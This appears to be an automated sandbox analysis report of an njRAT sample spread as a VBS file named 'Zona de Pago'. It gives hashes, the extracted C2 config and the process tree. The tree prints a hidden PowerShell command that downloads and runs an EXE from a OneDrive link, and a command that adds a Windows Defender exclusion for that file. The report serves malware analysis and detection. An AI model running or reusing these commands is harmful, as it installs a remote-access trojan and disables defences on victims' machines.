njrat | 282b7e31f3fff63d2f713d0841e75e52294bb6601454e78bfd9285839ec4a34a

General

Target

Zona de Pago.vbs
Size

162KB
MD5

df165c37e5339e9a1a720e593d8f2eb1
SHA1

29f8959f9934a0a4f64bbdb3dbaa878334814fc4
SHA256

282b7e31f3fff63d2f713d0841e75e52294bb6601454e78bfd9285839ec4a34a
SHA512

277043fe7d52b876d3c8e04d0ae76f232a6e64774aeb89399c1e47952e82c65814e9004a0dcf1a824ca45ce52a05619b33fc7bcb9e33e740ecb83cc20b12b447

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21150&authkey=AKfJKvTWpXPaOuE

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

reald27.duckdns.org:3525

Mutex

f45dd4eb26

Attributes

reg_key
f45dd4eb26
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

8 1816 powershell.exe
10 1816 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

4060 Hostdyn.exe
1840 Hostdyn.exe

flow	pid	process
8	1816	powershell.exe
10	1816	powershell.exe

pid	process
4060	Hostdyn.exe
1840	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zona de Pago.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zona de Pago.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 4060 set thread context of 1840 4060 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

1816 powershell.exe
1816 powershell.exe
1816 powershell.exe
1948 powershell.exe
1948 powershell.exe
1948 powershell.exe

description	pid	process	target process
PID 4060 set thread context of 1840	4060	Hostdyn.exe	Hostdyn.exe

pid	process
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe
Token: 33	1840	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1840	Hostdyn.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 1440 wrote to memory of 1816	1440	WScript.exe	powershell.exe
PID 1440 wrote to memory of 1816	1440	WScript.exe	powershell.exe
PID 1816 wrote to memory of 4060	1816	powershell.exe	Hostdyn.exe
PID 1816 wrote to memory of 4060	1816	powershell.exe	Hostdyn.exe
PID 1816 wrote to memory of 4060	1816	powershell.exe	Hostdyn.exe
PID 4060 wrote to memory of 1948	4060	Hostdyn.exe	powershell.exe
PID 4060 wrote to memory of 1948	4060	Hostdyn.exe	powershell.exe
PID 4060 wrote to memory of 1948	4060	Hostdyn.exe	powershell.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe
PID 4060 wrote to memory of 1840	4060	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zona de Pago.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21150&authkey=AKfJKvTWpXPaOuE' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hostdyn.exe.log
MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2b68e1dae8840fb22a04fee9e3d6cd01

SHA1
c0084ab318b9fdcef77d82a0daf9340c518273f0

SHA256
28a6bc596d886c07c2da2d27d411306a8d274ccb6d6771cb2b00570ddc0b8929

SHA512
bb23dc2427102cbdacaa4f910754cdbeec591d0889b70eaef71d0a069dd54037d6b43083127f323cbbd3102db85090670b4b179a7b94266bd94cbdba2929b331

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
0bb825d7755c400a76fd8512f6baab38

SHA1
278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

SHA256
2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

SHA512
60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
0bb825d7755c400a76fd8512f6baab38

SHA1
278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

SHA256
2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

SHA512
60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
0bb825d7755c400a76fd8512f6baab38

SHA1
278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

SHA256
2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

SHA512
60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

Download Submit
memory/1816-114-0x0000000000000000-mapping.dmp

Download
memory/1816-132-0x0000016F4A446000-0x0000016F4A448000-memory.dmp

Filesize
8KB

Download
memory/1816-131-0x0000016F4A443000-0x0000016F4A445000-memory.dmp

Filesize
8KB

Download
memory/1816-130-0x0000016F4A440000-0x0000016F4A442000-memory.dmp

Filesize
8KB

Download
memory/1816-125-0x0000016F4B010000-0x0000016F4B011000-memory.dmp

Filesize
4KB

Download
memory/1816-119-0x0000016F4A3A0000-0x0000016F4A3A1000-memory.dmp

Filesize
4KB

Download
memory/1840-164-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1840-184-0x0000000005640000-0x0000000005B3E000-memory.dmp

Filesize
5.0MB

Download
memory/1840-165-0x000000000040676E-mapping.dmp

Download
memory/1948-186-0x0000000007230000-0x0000000007231000-memory.dmp

Filesize
4KB

Download
memory/1948-196-0x0000000009010000-0x0000000009043000-memory.dmp

Filesize
204KB

Download
memory/1948-410-0x0000000009430000-0x0000000009431000-memory.dmp

Filesize
4KB

Download
memory/1948-404-0x0000000009440000-0x0000000009441000-memory.dmp

Filesize
4KB

Download
memory/1948-163-0x0000000000000000-mapping.dmp

Download
memory/1948-211-0x0000000009530000-0x0000000009531000-memory.dmp

Filesize
4KB

Download
memory/1948-210-0x0000000006D13000-0x0000000006D14000-memory.dmp

Filesize
4KB

Download
memory/1948-209-0x000000007EA90000-0x000000007EA91000-memory.dmp

Filesize
4KB

Download
memory/1948-208-0x0000000009160000-0x0000000009161000-memory.dmp

Filesize
4KB

Download
memory/1948-174-0x0000000004770000-0x0000000004771000-memory.dmp

Filesize
4KB

Download
memory/1948-175-0x0000000007350000-0x0000000007351000-memory.dmp

Filesize
4KB

Download
memory/1948-177-0x0000000006D12000-0x0000000006D13000-memory.dmp

Filesize
4KB

Download
memory/1948-176-0x0000000006D10000-0x0000000006D11000-memory.dmp

Filesize
4KB

Download
memory/1948-178-0x00000000072C0000-0x00000000072C1000-memory.dmp

Filesize
4KB

Download
memory/1948-179-0x0000000007A80000-0x0000000007A81000-memory.dmp

Filesize
4KB

Download
memory/1948-180-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

Filesize
4KB

Download
memory/1948-181-0x0000000007B60000-0x0000000007B61000-memory.dmp

Filesize
4KB

Download
memory/1948-203-0x0000000008FF0000-0x0000000008FF1000-memory.dmp

Filesize
4KB

Download
memory/1948-188-0x00000000082C0000-0x00000000082C1000-memory.dmp

Filesize
4KB

Download
memory/1948-187-0x0000000007FF0000-0x0000000007FF1000-memory.dmp

Filesize
4KB

Download
memory/4060-149-0x0000000000000000-mapping.dmp

Download
memory/4060-153-0x0000000000410000-0x0000000000411000-memory.dmp

Filesize
4KB

Download
memory/4060-160-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/4060-155-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/4060-156-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/4060-157-0x0000000004D40000-0x000000000523E000-memory.dmp

Filesize
5.0MB

Download
memory/4060-158-0x0000000004E00000-0x0000000004E01000-memory.dmp

Filesize
4KB

Download
memory/4060-159-0x0000000005130000-0x0000000005137000-memory.dmp

Filesize
28KB

Download
memory/4060-162-0x000000000ABF0000-0x000000000AC12000-memory.dmp

Filesize
136KB

Download
memory/4060-161-0x0000000008450000-0x00000000084A7000-memory.dmp

Filesize
348KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads